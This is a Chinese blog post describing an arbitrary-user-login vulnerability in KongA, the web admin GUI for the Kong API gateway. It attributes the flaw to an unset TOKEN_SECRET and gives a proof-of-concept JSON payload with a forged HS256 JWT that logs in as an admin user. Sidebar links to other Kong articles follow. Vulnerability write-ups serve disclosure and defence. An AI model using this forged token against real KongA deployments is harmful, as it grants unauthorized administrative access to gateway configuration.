konga任意用户登录

最新推荐文章于 2024-06-19 18:06:31 发布
最新推荐文章于 2024-06-19 18:06:31 发布
阅读量355 收藏 7
点赞数 5
文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69678131/article/details/138653041
版权

声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者和此公众号不为此承担任何责任。

  • 环境

KongA 简介

KongA 介绍 KongA 是 Kong 的一个 GUI 工具。GitHub 地址是 https://github.com/pantsel/konga。KongA 概述 KongA 带来的一个最大的便利就是可以很好地通过UI观察到现在 Kong 的所有的配置,并且可以对于管理 Kong 节点

漏洞成因

未设置TOKEN_SECRET导致攻击者可以伪造任意用户的token登录后台。

POC

{"user":{"createdUser":null,"updatedUser":1,"node":{"id":1,"name":"admin","type":"default","kong_admin_url":"1","netdata_url":null,"kong_api_key":"","jwt_algorithm":"HS256","jwt_key":null,"jwt_secret":null,"username":"","password":"","kong_version":"0.14.9","health_checks":false,"health_check_details":null,"active":false,"createdAt":"1","updatedAt":"1","createdUser":1,"updatedUser":1},"id":1,"username":"1","email":"qq@qq.com","firstName":null,"lastName":null,"admin":true,"node_id":"","active":true,"activationToken":"1","createdAt":"1","updatedAt":"1"},"token":"eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo"}

这就登录上来了

王洛尘
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Kong网关中使用OAuth2认证
锐意工作室
07-21 3117
文章目录在Kong网关中使用OAuth2认证前言在Kong上开启HTTPSOAuth2认证添加OAuth2插件创建Consumer的OAuth2 credential测试OAuth2 Authorization Flow获取Authorization Code获取Access Token用Access Token来调用接口用Refresh Token来重新获取Access Token与IDP集成参考文档 在Kong网关中使用OAuth2认证 前言 在Kong网关快速入门指南 和 在Kong网关中使用JWT认
KONG管理界面KONGA安装使用
robinhunan的博客
12-19 3422
功能 管理所有Kong Admin API的对象. 从数据库、文件和API等导入Consumers。 管理Kong多个节点。 备份、恢复、迁移Kong Nodes使用快照。 使用健康检测监控节点和API状态。 Email和Slack消息通知 支持多管理用户和设置不同权限 支持数据库MySQL, postgresSQL, MongoDB, SQL Server。 安装 安装Node...
konga0.14.9镜像
04-14
konga0.14.9镜像
可视化管理工具konga
05-10
浏览器输入 localhost:1338,端口可以在local.js改 默认登录名admin,密码是三个admin 配置kong API地址要填写完整地址,后面不要带‘/’ http://localhost:8001
konga-0.14.9
11-22
konga-0.14.9
konga-master.zip
04-17
KONG网关 — KongA管理UI使用 konga-master 未kong 界面化开源代码 konga,详情可以查看kong
kong api可视化管理工具konga安装使用教程
热门推荐
偶爱喝可乐
11-06 1万+
安装这个有些小坑,根据报错信息都可以解决。 安装依赖 # 我的是Deepin 15.4,其它版本系统自行搜索 sudo apt-get install nodejs npm gulp sudo npm install -g bower sudo npm install -g sails 安装konga git clone https://github.com/pantsel/konga.git cd
kongkonga的动态负载均衡配置实战
weixin_45342351的博客
04-04 4494
网关kong是基于nginx开发,主要作用实现负载均衡。nginx也可以实现负载均衡,但缺点是每次配置后需要重新加载配置文件,重启服务器。kong可以在服务不重启的情况下,动态的配置负载均衡。 一,网关kong接口实现负载均衡的配置 1,配置网关server,name是server名称,host是下游节点服务器名称,每当有请求经过server,都会通过host转发给下游服务器处理 curl -X POST http://ip:8001/services --data "name=api-server"
kongkonga完整安装包(linux)
02-26
安装方法:https://blog.csdn.net/qq_14999375/article/details/129228919 kong&konga完整安装包,包含文件: - kong - konga(已编译) - postgreSQL12.2 - node14
Kong网关部署(一)
黄飞翔的博客
05-26 898
Kong的入门Kong网关部署(一)写在前面二.安装Kong需要的数据库PostgreSQL1. 准备:安装依赖组件2.安装及配置三.操作postgresql1. 修改postgres用户密码2. 创建用户(名字任意)3. 创建叫kong的数据库(名字任意)4. 赋予用户权限5. 防火墙打开5432端口6. postgresql常用操作四.安装Kong1. 下载安装包2. 安装3. 配置数据库连接4. 初始化数据库5. 启动kong6. 测试kong7. 设置开机自启动五.安装Kong Dashboard可
KONGKONG两款admin UI
bocai_xiaodaidai的博客
07-27 2275
当前KONG的社区版是没有dashboard的,但是付费的企业版是有带的,并且还有一些企业版才能使用的插件以及升级后的企业版插件。所以对于使用社区版的用户而言,排除自己去撸一个dashboard的这种选择,第三方开源的dashboard无疑是首选。 Github上热度比较高的有几款,分别是kongdash,kong-dashboard,konga,kong-admin-ui,但目前来看好像都很久没有维护了。 我部署过后三款UI,但貌似都有bug,总体来看konga、kong-admin-ui感觉
KongA 任意用户登录漏洞分析
why811的博客
09-28 953
KongA 介绍 KongA 是 Kong 的一个 GUI 工具。GitHub 地址是 https://github.com/pantsel/konga。KongA 概述 KongA 带来的一个最大的便利就是可以很好地通过UI观察到现在 Kong 的所有的配置,并且可以对于管理 Kong 节点。
逻辑漏洞任意用户登陆漏洞
zhangge3663的博客
03-13 4731
环境 环境: Web: phpstudy 5.4.45 System: Windows 10x64 源码版本为:vlcms_1.2.0 什么是任意用户登录漏洞 几乎每个网站都有自己的会员系统,有会员,就有登录机制,如果可以登录其他用户账户,那么就可以窃取其他用户的资料数据。如果配合上脚本的话,甚至可以批量获取用户的数据。对网站来说,任意用户登录是一个很高危的漏洞。 环境搭建 imag...
kong插件开发-完全版
最爱下雨天
11-12 5650
Kong 插件开发 1. 简介 Kong是一个api网关,在客户端和服务间转发API进行通信,支持自定义插件来扩展功能。 Kong 是在Nginx基础上构建的,更确切地说,kong是在Nginx中运行的Lua应用程序,由 lua-nginx-module实现。 Kong和OpenResty一起发行的,其中已经包含了lua-nginx=module。其中OpenResty不是Nginx的分支,而是...
深信服终端安全管理系统EDR版本升级过程
m0_64423407的博客
06-19 200
深信服终端安全管理系统EDR版本升级统一端点安全管理系统aES
在物联网设备安全中,如何有效进行固件更新管理?
2403_84237550的博客
06-17 359
• 更新后持续监控设备状态,评估更新效果,及时发现并解决更新带来的新问题。在物联网设备安全中,有效进行固件更新管理是一个关键环节,涉及到多个步骤和策略,以确保更新过程既安全又高效。• 在部署固件更新前,进行全面的安全验证和兼容性测试,确保更新包的来源可靠,未被篡改,并且不会影响设备的正常运行。• 记录每次固件更新的详细信息,包括更新时间、版本号、更新内容和操作人员等,以便追溯和审计。• 加强用户对固件更新重要性的认识,教育用户如何正确执行和验证更新,提升整体安全意识。
安全】Linux Fanotify使用入门
最新发布
追寻梦想的青春
06-19 488
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
第九站:Java黑——安全编码的坚固防线
hummhumm的专栏
06-16 464
通过上述三个示例(加密解密、防止SQL注入、防止XSS攻击),我们看到了Java中实现安全编码的一些基础实践。记住,安全是一个多层面的问题,除了这些基本措施外,还应考虑使用最新的安全框架和库,进行定期的安全审计,以及培养良好的开发习惯,如最小权限原则、代码审查等,以构建更加健壮和安全的应用程序。
linux安装konga
12-30
Konga是一个基于Kong的用户友好的控制台管理工具,可以用来管理Kong的API和插件。要在Linux系统上安装Konga,首先需要确保系统上已经安装了Node.js和npm包管理器。接下来,可以通过npm全局安装Konga的包,使用以下命令:`npm install -g konga`。 安装完成后,可以通过命令行启动Konga:`konga start`。接着,可以在浏览器中输入`http://localhost:1337`来访问Konga的web界面。在界面上,可以配置Konga连接到Kong的地址,以便Konga可以管理Kong的API和插件。配置完成后,就可以在Konga中进行API和插件的管理操作了。 在安装和配置Konga过程中,需要确保系统上有合适的权限和依赖,以便Konga可以正常运行。此外,还可以根据实际需求将Konga集成到现有的系统中,以便更方便地管理Kong的API和插件。 总之,在Linux系统上安装Konga,需要先安装Node.js和npm包管理器,然后通过npm安装Konga的包,最后进行配置和启动即可。安装和配置的过程可能会根据具体的系统环境和需求有所不同,但以上步骤可以作为一般的指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值